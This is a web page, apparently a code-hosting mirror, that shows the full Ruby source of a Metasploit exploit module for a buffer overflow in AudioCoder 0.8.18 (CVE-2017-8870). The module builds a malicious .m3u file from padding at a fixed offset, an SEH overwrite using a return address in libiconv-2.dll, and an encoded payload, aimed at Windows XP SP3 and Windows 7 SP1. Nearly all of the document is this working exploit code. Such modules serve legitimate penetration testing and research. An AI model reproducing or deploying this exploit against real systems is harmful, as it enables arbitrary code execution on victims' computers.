Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/fileformat/audio_coder_m3u.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'AudioCoder .M3U Buffer Overflow',14'Description' => %q{15This module exploits a buffer overflow in AudioCoder 0.8.18. The vulnerability16occurs when adding an .m3u, allowing arbitrary code execution with the privileges17of the user running AudioCoder. This module has been tested successfully on18AudioCoder 0.8.18.5353 over Windows XP SP3 and Windows 7 SP1.19},20'License' => MSF_LICENSE,21'Author' =>22[23'metacom', # Vulnerability discovery and PoC24'juan vazquez' # Metasploit module25],26'References' =>27[28[ 'CVE', '2017-8870' ],29[ 'OSVDB', '92939' ],30[ 'EDB', '25141' ]31],32'DefaultOptions' =>33{34'EXITFUNC' => 'process'35},36'Platform' => 'win',37'Payload' =>38{39'Space' => 6596,40'BadChars' => "\x00\x5c\x40\x0d\x0a",41'DisableNops' => true,42'StackAdjustment' => -3500,43},44'Targets' =>45[46[ 'AudioCoder 0.8.18.5353 / Windows XP SP3 / Windows 7 SP1',47{48'Ret' => 0x66011b56, # ppr from libiconv-2.dll49'Offset' => 76550}51]52],53'Privileged' => false,54'DisclosureDate' => '2013-05-01',55'DefaultTarget' => 0))5657register_options(58[59OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),60])6162end6364def exploit65buffer = "http://"66buffer << rand_text(target['Offset'])67buffer << generate_seh_record(target.ret)68buffer << payload.encoded6970file_create(buffer)71end72end737475